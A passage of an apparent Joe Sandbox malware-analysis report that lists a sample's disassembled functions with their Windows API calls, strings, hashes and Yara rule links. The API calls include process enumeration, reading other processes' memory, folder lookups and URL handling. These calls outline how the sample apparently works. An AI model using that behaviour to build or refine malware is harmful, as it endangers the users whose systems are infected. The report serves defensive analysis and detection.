Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

CloseHandle.KERNEL32(00000000), ref: 009F3DFE

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction ID: 4613ca5da611e95c8da17667c185c57458caafca7d70d9154caf4ace0637f62b
Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction Fuzzy Hash: C281E370900208CFD715CF28D888BA5B7B5BF44329F29C1A9D5099B3E2D77A9D82CF90

Function 009EE8A7 Relevance: 6.2, APIs: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EE8F2
lstrcpy.KERNEL32(00000000,?), ref: 009EE927
lstrcat.KERNEL32(?,00000000), ref: 009EE933
lstrcat.KERNEL32(?,00638B00), ref: 009EE94C

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction ID: dc9155c1a992af4df2cd55cdeb1ea15be016a61ecba37b376010504f3a1b03d6
Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
Instruction Fuzzy Hash: DC51E475244244AFC354EF24DC42FEA7BE9EBC8304F40C82AB95583391DE74E909CB92

Function 009F2443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 009F2469
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009F2545
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 009F25A7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009F2686), ref: 009F25B9

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction ID: d33434a776b49e47fe2e673b490ed192d0f8f41415476eb25c20cbea11b058c4
Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction Fuzzy Hash: F3418171A0421A9BDF20CFA4D894BBE77BAFB84724F244529FA15EB250D374DD418B90

Function 009E8027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009E803F

Part of subcall function 009FA457: std::exception::exception.LIBCMT ref: 009FA46C
Part of subcall function 009FA457: __CxxThrowException@8.LIBCMT ref: 009FA481
Part of subcall function 009FA457: std::exception::exception.LIBCMT ref: 009FA492

std::_Xinvalid_argument.LIBCPMT ref: 009E805D
std::_Xinvalid_argument.LIBCPMT ref: 009E8078
memcpy.MSVCRT(?,?,?,00000000,?,?,009E7F61,00000000,?,?,00000000,?,009D941D,?), ref: 009E80DB

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 6d015b3e0442a350306e2a0b06e0b684459c765e0e571310901fd71f60a733f3
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: D62109313006408FC726DEADDC80B6BB7E9FF90711F20492EE5498B281DBB1DC448765

Function 009F35C7 Relevance: 6.0, APIs: 4, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F35F6
RtlAllocateHeap.NTDLL(00000000), ref: 009F35FD
GlobalMemoryStatusEx.KERNEL32 ref: 009F3618
wsprintfA.USER32 ref: 009F363E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID:
API String ID: 2922868504-0
Opcode ID: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
Instruction ID: 1ff099f033e1b106f1c59360207cec33486c820767897b5736a16f79ff386266
Opcode Fuzzy Hash: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
Instruction Fuzzy Hash: A401B5B1A04258ABD714DBA8DC46B7EB7B9EB44710F104629F906D7380D7B859008BA5

Function 009F2D67 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,0042A400,000000FF), ref: 009F2D96
RtlAllocateHeap.NTDLL(00000000), ref: 009F2D9D
GetLocalTime.KERNEL32(?), ref: 009F2DA9
wsprintfA.USER32 ref: 009F2DD5

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
Instruction ID: ef460e4f05b1cc59e4f337cdf8022e820f68ef2e8f2f31b22460d179b2b2908b
Opcode Fuzzy Hash: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
Instruction Fuzzy Hash: 720112B2904624ABCB149BD9DD45FBFB7BDFB4CB11F00011AF645A2290E7B85940C7B5

Function 009ECCC4 Relevance: 6.0, APIs: 4, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00435204), ref: 009ECCCA
StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 009ECCE1
StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 009ECCF8
strtok_s.MSVCRT ref: 009ECDEE

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction ID: 85aaeb7db99fc57a6ba3c0ab42fbde9555e18906f0e4aece18c0eaa64ebc5907
Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction Fuzzy Hash: 0B01A2B1A40254ABCB129FA1DC45BAE7BA8EF10705F204466E845A7240D7B89E468EA5

Function 009F75A7 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
lstrcpy.KERNEL32(00000000), ref: 009F75D6
lstrcat.KERNEL32(?,------), ref: 009F75E0

Strings

------, xrefs: 009F75A9, 009F75DE

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpylstrlen
String ID: ------
API String ID: 3050337572-882505780
Opcode ID: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
Instruction ID: a7a63205aa40666df0fd297fbd587b7d09be90655f299af4df05b44ca2e4e1af
Opcode Fuzzy Hash: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
Instruction Fuzzy Hash: 10F039749043028FCB209F75DC88926BBFAEF84745314882DB88AC3214EB34D840CF60

Function 009E39D7 Relevance: 5.5, APIs: 4, Instructions: 490stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746

lstrcpy.KERNEL32(00000000,?), ref: 009E3A35
lstrcpy.KERNEL32(00000000,?), ref: 009E3A5E
lstrcpy.KERNEL32(00000000,?), ref: 009E3A84
lstrcpy.KERNEL32(00000000,?), ref: 009E3AAA

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
Instruction ID: e90bbec360614187c1b06e8cd501629475c112fae6e8f5b307a56bc869e776ef
Opcode Fuzzy Hash: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
Instruction Fuzzy Hash: ED12DD70A112418FDB29CF1AC558B25B7E9AF44718B2DC1ADD809DB3A2D772DD82CF90

Function 004087B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040880C
memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

string too long, xrefs: 00408807

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D

Function 009D8AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009D8B1A

Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445

Strings

yxxx, xrefs: 009D8B24
yxxx, xrefs: 009D8B71

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: e83c433dcba50ec502fa6f3014039e3f463c7999974a6b31344b31588c504ba7
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 8F3179B5E005199BCB08DF58C8916AEBBB6EB88310F14C26AE9159F385DB34A901CBD1

Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408AA5

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,?,?), ref: 00408AEF

Strings

string too long, xrefs: 00408AA0

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
String ID: string too long
API String ID: 2475949303-2556327735
Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798

Function 009F5B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009F5BA9

Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445

std::_Xinvalid_argument.LIBCPMT ref: 009F5BBC

Strings

Sec-WebSocket-Version: 13, xrefs: 009F5BAE

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction ID: 6c1e197039fb8bc44ce70916319b518d3b595a2e610af4ed309bbf6c42dca234
Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction Fuzzy Hash: 1311E531314B448BC3319F2CE800B2A77E5ABD1711F260B6DE292C7685C761D84287A5

Function 00408BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408BBF

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5

Strings

invalid string position, xrefs: 00408BBA

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 655285616-1799206989
Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398

Function 009D4D47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 009D4DA6
InternetCrackUrlA.WININET(?,00000000), ref: 009D4DAE

Strings

<, xrefs: 009D4D6E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
Instruction ID: 2e23a665bef70e6716fa7f32c5965a04101f40d52bf71b1245d566adfa5bfcc8
Opcode Fuzzy Hash: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
Instruction Fuzzy Hash: B0011B71D00218AFDB10DFA8EC45B9EBBA9EB59360F00812AF954E7390DB7459058FD0

Function 009D89A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 009D89CE

Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445

Strings

yxxx, xrefs: 009D89D8
yxxx, xrefs: 009D89B0

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: 38b8c436f46292dc5028c26d3c2d6dd1deed76e767c1c2ded7ab3ebfa8b3c595
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: 33F0B463B800320B8314A47D9D844AFA90796E439033AD727E91ADF39EEC31EC8295D1

Function 009EC4D0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction ID: a88db62c56f39d4aed32f7e0bddedf94938a74d358f9bfd8be25c631e80e59eb
Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
Instruction Fuzzy Hash: 37318FB1D042899BCB21EFA4CC85BAEB7B5EF85304F148466F514A7252DB74ED02DF50

Function 009EC41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545

Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F40AC
Part of subcall function 009F4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 009F40D6
Part of subcall function 009F4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009D1495,?,0000001A), ref: 009F40E0

lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5B2
lstrcat.KERNEL32(00000000), ref: 009EC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC629

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction ID: 3dd3aa9787047394b2aa59adc91addb4ca3f64d956732bd5c5039e432adc3d3f
Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction Fuzzy Hash: 9031C1B1E042889BCB21EFA4CC85BAEB7B5EF85304F148466F444A7251DB74EE42DF40

Function 009EC479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 009F42B4
Part of subcall function 009F4287: lstrcpy.KERNEL32(00000000,?), ref: 009F42E9

Part of subcall function 009F7557: lstrcpy.KERNEL32(00000000), ref: 009F7586
Part of subcall function 009F7557: lstrcat.KERNEL32(00000000), ref: 009F7592

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

